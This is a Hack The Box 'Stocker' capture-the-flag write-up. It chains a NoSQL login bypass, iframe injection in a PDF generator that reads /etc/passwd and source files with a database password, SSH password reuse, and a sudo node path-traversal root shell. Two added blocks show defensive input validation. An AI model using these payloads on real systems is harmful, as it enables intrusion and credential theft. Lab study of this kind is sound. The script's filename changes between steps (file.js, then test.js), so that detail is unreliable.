Hack The Box | Stocker | Write Up

Just tackled the ‘Stocker’ machine on #HackTheBox. Loved the exploitation of web vulnerabilities and the challenge of the injections! If you’re into #CTF, this is a must try! 🚀 #CyberSecurity #PenTesting #EthicalHacking #InfoSec

We will check which services are running on this machine with Nmap:

sudo nmap -sT -n -Pn -sV -T4 -v 10.10.11.196

We have found two open ports (22/TCP and 80/TCP):

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Now, we will look at the nginx server through our browser, but first we need to add the host to our “/etc/hosts” file:

We found some kind of business web page:

Now, we need to check the functionality of the web page to try to find something interesting. We can also run the “ffuf” tool to discover interesting directories:

sudo ffuf -w /usr/share/dirb/wordlists/common.txt -u http://stocker.htb/FUZZ -v
[Status: 200, Size: 15463, Words: 4199, Lines: 322, Duration: 50ms]
| URL | http://stocker.htb/
    * FUZZ: 

[Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 62ms]
| URL | http://stocker.htb/css
| --> | http://stocker.htb/css/
    * FUZZ: css

[Status: 200, Size: 1150, Words: 4, Lines: 1, Duration: 51ms]
| URL | http://stocker.htb/favicon.ico
    * FUZZ: favicon.ico

[Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 48ms]
| URL | http://stocker.htb/fonts
| --> | http://stocker.htb/fonts/
    * FUZZ: fonts

[Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 52ms]
| URL | http://stocker.htb/img
| --> | http://stocker.htb/img/
    * FUZZ: img

[Status: 200, Size: 15463, Words: 4199, Lines: 322, Duration: 51ms]
| URL | http://stocker.htb/index.html
    * FUZZ: index.html

[Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 77ms]
| URL | http://stocker.htb/js
| --> | http://stocker.htb/js/
    * FUZZ: js

:: Progress: [4614/4614] :: Job [1/1] :: 649 req/sec :: Duration: [0:00:07] :: Errors: 0 ::

We haven’t found anything interesting yet, but we need to keep checking the web page:

We haven’t found anything interesting in the source code either. We can try to enumerate subdomains with “ffuf” by performing VHOST discovery (https://medium.com/quiknapp/fuzz-faster-with-ffuf-c18c031fc480):

sudo ffuf -c -w /home/david/hackthebox/stocker/dic.txt -u http://stocker.htb -H "Host: FUZZ.stocker.htb" -mc 200,302,307 -v

I have used this dictionary:

https://github.com/danielmiessler/SecLists/blob/master/Discovery/DNS/subdomains-top1million-5000.txt

We will find one possible virtual host:

________________________________________________

 :: Method           : GET
 :: URL              : http://stocker.htb
 :: Wordlist         : FUZZ: /home/david/hackthebox/stocker/dic.txt
 :: Header           : Host: FUZZ.stocker.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,302,307
________________________________________________

[Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 72ms]
| URL | http://stocker.htb
| --> | /login
    * FUZZ: dev

:: Progress: [4989/4989] :: Job [1/1] :: 653 req/sec :: Duration: [0:00:07] :: Errors: 0 ::

We need to add this new subdomain to our “/etc/hosts” file:

After that, we will be able to see this new web page:

Apparently it is some kind of login. Let’s try to get more information about this login. We will check whether we can do some SQL injection with sqlmap:

sudo sqlmap -u "http://dev.stocker.htb/login" --data="username=example&password=example"

We have not received any information about which database is in the backend. We will try to exploit a NoSQL database instead. We can find some information about that here (https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection). We will try with the following payload:

{"username": {"$ne": null}, "password": {"$ne": null}}

Now, we need to modify our request to try to bypass the login. We need to change the “Content-Type” header to JSON and send the data (username and password) as the JSON body above:

Finally, the bypass works and we receive another redirect, this time to “/stock”:
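The reason the “$ne” body works is that once the request is parsed as JSON, a field that the server expects to be a string can arrive as an object, and a Mongo-style driver will treat that object as a query operator. The following is an added example, not code from the Stocker application: a constructed in-memory stand-in for the collection (supporting only equality and “$ne”), the vulnerable login pattern that passes body fields straight into the filter, and the hardened version that rejects anything that is not a plain string. The user record, the sample password and the function names are all assumptions made for the demonstration.

```javascript
// Added example (not from the Stocker box): why {"$ne": null} bypasses an
// unvalidated Mongo-style login, and the type check that stops it.

// Constructed toy "collection" supporting equality and the $ne operator,
// which is enough to mirror how the real query would behave.
function fieldMatches(stored, condition) {
  if (condition !== null && typeof condition === "object" && !Array.isArray(condition)) {
    if ("$ne" in condition) return stored !== condition.$ne;
    return false; // other operators are not modelled in this toy
  }
  return stored === condition;
}

function findOne(users, filter) {
  const keys = Object.keys(filter);
  return users.find(u => keys.every(k => fieldMatches(u[k], filter[k]))) || null;
}

// Vulnerable pattern: JSON body fields go straight into the query filter.
// With Content-Type: application/json a field may arrive as an object, so
// {"$ne": null} becomes an operator ("password is not null") instead of a value.
function vulnerableLogin(users, body) {
  return findOne(users, { username: body.username, password: body.password });
}

// Hardened pattern: refuse anything that is not a plain string before it can
// reach the database. (Real code would also hash passwords; the toy stores
// them in clear only to keep the comparison visible.)
function hardenedLogin(users, body) {
  if (typeof body.username !== "string" || typeof body.password !== "string") {
    return null;
  }
  return findOne(users, { username: body.username, password: body.password });
}

// Constructed sample data plus the injection body shown in the write-up.
const USERS = [{ username: "alice", password: "correct-horse" }];
const INJECTED = JSON.parse('{"username": {"$ne": null}, "password": {"$ne": null}}');
const WRONG = { username: "alice", password: "guess" };
const VALID = { username: "alice", password: "correct-horse" };

console.log("vulnerable + injected:", vulnerableLogin(USERS, INJECTED)); // alice's record
console.log("hardened   + injected:", hardenedLogin(USERS, INJECTED));   // null
console.log("hardened   + valid   :", hardenedLogin(USERS, VALID));      // alice's record
```

The same type check belongs on every field that ends up in a query, not only on the login form; a schema validator that pins each field to a scalar type achieves the same result with less code per handler.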

Now we will check some functions of this web page, like adding products, checking the cart, etc. If we look at how products are added to our basket, we will see this message:

Probably there is something interesting here. We can also use the “View Cart” option to check our products:

If we inspect the request with Burp Suite we will see that the data is sent as JSON, and we can probably modify it:

Another function generates PDFs of our purchases:

We can check the request with Burp Suite to see if something weird is happening:

We will see all of our products, but let’s try modifying our request to see if the PDF changes with our values:

We will check for XSS with Dynamic PDF. To do that we will change our “Submit Purchase” request with the following payload to see if we get some information disclosure. We will inject this payload into the “title” key:

<script>document.write(JSON.stringify(window.location))</script>

After creating our “order” we will click on the link to see our PDF:

We will discover that this web application is vulnerable to XSS with Dynamic PDF (https://exploit-notes.hdks.org/exploit/web/security-risk/xss-with-dynamic-pdf/):

Now we will try to extract more information to gain access. We can try to obtain the “/etc/passwd” file:

<iframe src=file:///etc/passwd></iframe>

Now we need to generate the PDF:

We will see our data, but with one issue: we can’t see all of it because the iframe is too small:

We need to modify our payload to something like this:

<iframe src=file:///etc/passwd height=1000 width=1000></iframe>

Now we will see everything:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:112:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:113::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:114::/nonexistent:/usr/sbin/nologin
landscape:x:109:116::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
fwupd-refresh:x:112:119:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
mongodb:x:113:65534::/home/mongodb:/usr/sbin/nologin
angoose:x:1001:1001:,,,:/home/angoose:/bin/bash
_laurel:x:998:998::/var/log/laurel:/bin/false

We have discovered two users:

mongodb
angoose
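The file read above is possible because the order fields are placed into the HTML that the PDF renderer loads without escaping, so a “script” or “iframe” tag in the title becomes part of the document and the renderer, which runs with local file access, fetches “file:///etc/passwd”. The following is an added example, not the Stocker application’s code: a minimal order template in the vulnerable form and in a hardened form that HTML-escapes every untrusted field, checked against the two payloads used in this write-up. The template markup, the “amount” field and the helper names are assumptions made for the demonstration.

```javascript
// Added example (not from the Stocker box): escaping untrusted order fields
// before they are templated into HTML that a headless browser renders to PDF.

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Replace every character that can open or close markup with its entity.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, ch => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the title string is interpolated as-is, so tags in it
// become live elements in the rendered document.
function renderOrderVulnerable(items) {
  return "<ul>" + items.map(i => `<li>${i.title} x${i.amount}</li>`).join("") + "</ul>";
}

// Hardened pattern: text fields are escaped, numeric fields are coerced to a
// number, so the payload is shown as visible text rather than executed.
function renderOrderHardened(items) {
  return "<ul>" + items.map(i => `<li>${escapeHtml(i.title)} x${Number(i.amount) || 0}</li>`).join("") + "</ul>";
}

// Rough detector for the element types that can run script or load remote/local
// resources inside a PDF renderer; used here only to compare the two outputs.
function containsActiveMarkup(html) {
  return /<(script|iframe|object|embed)\b/i.test(html);
}

// Constructed order whose titles are the payloads discussed in the write-up.
const ORDER = [
  { title: "<script>document.write(JSON.stringify(window.location))</script>", amount: 1 },
  { title: "<iframe src=file:///etc/passwd height=1000 width=1000></iframe>", amount: 2 },
];

console.log("vulnerable output active:", containsActiveMarkup(renderOrderVulnerable(ORDER))); // true
console.log("hardened output active:  ", containsActiveMarkup(renderOrderHardened(ORDER)));  // false
```

Escaping closes the injection itself; as defence in depth the renderer should additionally be run without access to local files and without network access, so that even a missed field cannot turn a PDF export into a file-read primitive.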

At this point, we can try to extract more information from the index file in the directory of the “dev” site we detected during our discovery phase:

Directory of the “dev” site: /var/www/dev/
<iframe src=file:///var/www/dev/index.js height=1000 width=1000></iframe>

We will discover the database connection string, including the password:

const dbURI = "mongodb://dev:IHeardPassphrasesArePrettySecure@localhost/dev?authSource=admin&w=1";

But we can’t connect as the user mongodb through SSH because its shell is “/usr/sbin/nologin”. We will try this password with the other user we discovered:

ssh angoose@10.10.11.196   (password: IHeardPassphrasesArePrettySecure)

Finally, we have our first remote connection:

Also, we can get our user flag:

angoose@stocker:~$ ls
flag.js  flag.js.save  user.txt

angoose@stocker:~$ cat user.txt 

Time to try to get access as root. Let’s see if we can execute some script or binary with sudo privileges:

angoose@stocker:~$ sudo -l
[sudo] password for angoose: 
Matching Defaults entries for angoose on stocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User angoose may run the following commands on stocker:
    (ALL) /usr/bin/node /usr/local/scripts/*.js

We have found that we can execute any “js” script in the directory “/usr/local/scripts” with the binary “/usr/bin/node” with sudo privileges. With a little searching on Google we can find this link (https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-path-traversal-privilege-escalation/). Now, to attempt privilege escalation, first of all we need to create a new file “/tmp/file.js” with this content:

require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})

Now we will perform a “Sudo Path Traversal Privilege Escalation”:

sudo /usr/bin/node /usr/local/scripts/../../../tmp/test.js

Finally, we have access as root:

We also have access to the root flag:

# cd /root      

# ls -la
total 44
drwx------  6 root root 4096 Jan  9 10:42 .
drwxr-xr-x 20 root root 4096 Dec 23 16:58 ..
lrwxrwxrwx  1 root root    9 Dec  6  2022 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Nov 19  2022 .bashrc
drwx------  3 root root 4096 Dec  6  2022 .cache
drwxr-xr-x  3 root root 4096 Dec  6  2022 .local
drwx------  3 root root 4096 Dec  6  2022 .mongodb
drwxr-xr-x  4 root root 4096 Dec  6  2022 .npm
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r-----  1 root root   33 Jun  9 14:08 root.txt
-rw-r--r--  1 root root   66 Dec 21 21:35 .selected_editor
-rw-r--r--  1 root root   13 Nov 19  2022 .vimrc

# cat root.txt

Finally, we pwned this machine!
